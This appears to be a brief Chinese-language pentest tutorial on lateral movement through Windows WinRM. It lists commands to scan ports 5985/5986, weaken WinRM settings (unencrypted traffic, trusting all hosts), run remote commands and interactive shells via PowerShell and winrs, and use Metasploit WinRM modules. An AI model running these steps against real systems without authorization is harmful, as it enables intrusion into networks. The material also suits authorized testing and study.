目录
讲在前面
横向渗透过程中工具非常多,在笔者所接触朋友圈来看大部分习惯使用impacket工具集或PsTools工具集等,笔者本文介绍利用WinRM服务进行横向移动,当然我们也可以利用impacket进行哈希传递来执行winrm服务,使用此服务结合其他工具或漏洞进行组合拳,事半功倍
注意:
winrm服务访问需要特殊权限且知悉账号密码,此处笔者利用域管理员权限进行实验。
扫描端口
nmap -p 5985,5986 -sV 指定IP
启动WinRM服务
winrm quickconfig
winrm set winrm/config/Client @{AllowUnencrypted = "true"}
Set-Item WSMan:localhost\client\trustedhosts -value *
或
Enable-PSRemoting -Force
Powershell执行
Invoke-Command -ComputerName TARGET -ScriptBlock { dir c:\ }
//命令执行
Invoke-Command -ComputerName TARGET -Credential 域名\用户名 -command {Get-Culture}
//命令执行
Invoke-Command -ComputerName TARGET -Credential 域名\用户名 -ScriptBlock {Get-Culture}
//命令执行
Enter-PSSession -ComputerName 10.2.0.100 -Credential administrator
//返回交互式shell
CMD执行
winrs -r:http://10.2.0.111:5985 -u:机器名\用户名 -p:xxxxx "ipconfig"
winrs -r:https://10.2.0.111:5985 -u:机器名\用户名 -p:xxxxx "ipconfig"
获取交互式shell
winrs -r:http://10.2.0.111:5985 -u:机器名\用户名 -p:xxxxx cmd
winrs -r:https://10.2.0.111:5985 -u:机器名\用户名 -p:xxxxx cmd
MSF执行
exploit/windows/winrm/winrm_script_exec //WinRM代码执行模块配置
auxiliary/scanner/winrm/winrm_cmd //WinRM命令执行
auxiliary/scanner/winrm/winrm_auth_methods //WinRM Auth方法
auxiliary/scanner/winrm/winrm_login //WinRM凭证发现